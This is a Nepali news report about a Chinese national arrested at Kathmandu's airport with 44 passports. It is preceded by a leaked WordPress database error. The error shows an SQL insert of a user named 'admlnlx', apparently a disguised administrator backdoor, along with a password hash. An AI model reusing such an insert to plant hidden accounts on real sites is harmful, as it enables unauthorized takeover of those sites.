WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGr7JM2MUGWlPt.XgR7xOnVQyuifPR.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 02:46:29', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ १३ –
त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलबाट ४४ थान राहदानीसहित एक चिनियाँ नागरिक पक्राउ परेका छन् । बुधबार राति ड्रागन एयरबाट हङकङ जान लागेका वइविन हि विमानस्थलबाट पक्राउ परेका हुन् ।
राति १० बजेको उडानबाट हङकङ जान विमानस्थल पुगेका हिको हृयाण्ड ब्यागमा ४४ थान पासपोर्ट भेटिएको छ । विमानस्थलका डीआइजी गोविन्द निरौलाका अनुसार चिनियाँको हृयाण्ड ब्याग एक्सरे मेसिनमा चेक गर्दा शंकास्पद देखिएपछि नियन्त्रणमा लिएर अनुसन्धान गरिएको थियो ।
विमानस्थलका एक अधिकृतका अनुसार हिको साथबाट बरामद भएका सबै राहदानी चिनियाँ नागरिककै हुन् । प्रारम्भिक बयानमा उनले साउदी अरबको भिसा लगाउन ४४ जना चिनियाँको राहदानी बोकेर गत १८ तारिखमा काठमाडौं आएका थिए ।
चीनबाट साउदीको भिसा लगाउन गाह्रो हुने भएकाले आफू काठमाडौं आएको बताए पनि उनको साथबाट बरामद भएको एउटा पनि राहदानीमा साउदीको भिसा छैन । उनले आफू व्यवसायी भएको बताएका छन् ।
बरामद पास्पोर्टका बारेमा चिनियाँ दूतावास मार्फत विस्तृत जानकारी माग्ने काम भैरहेको प्रहरीले जनाएको छ ।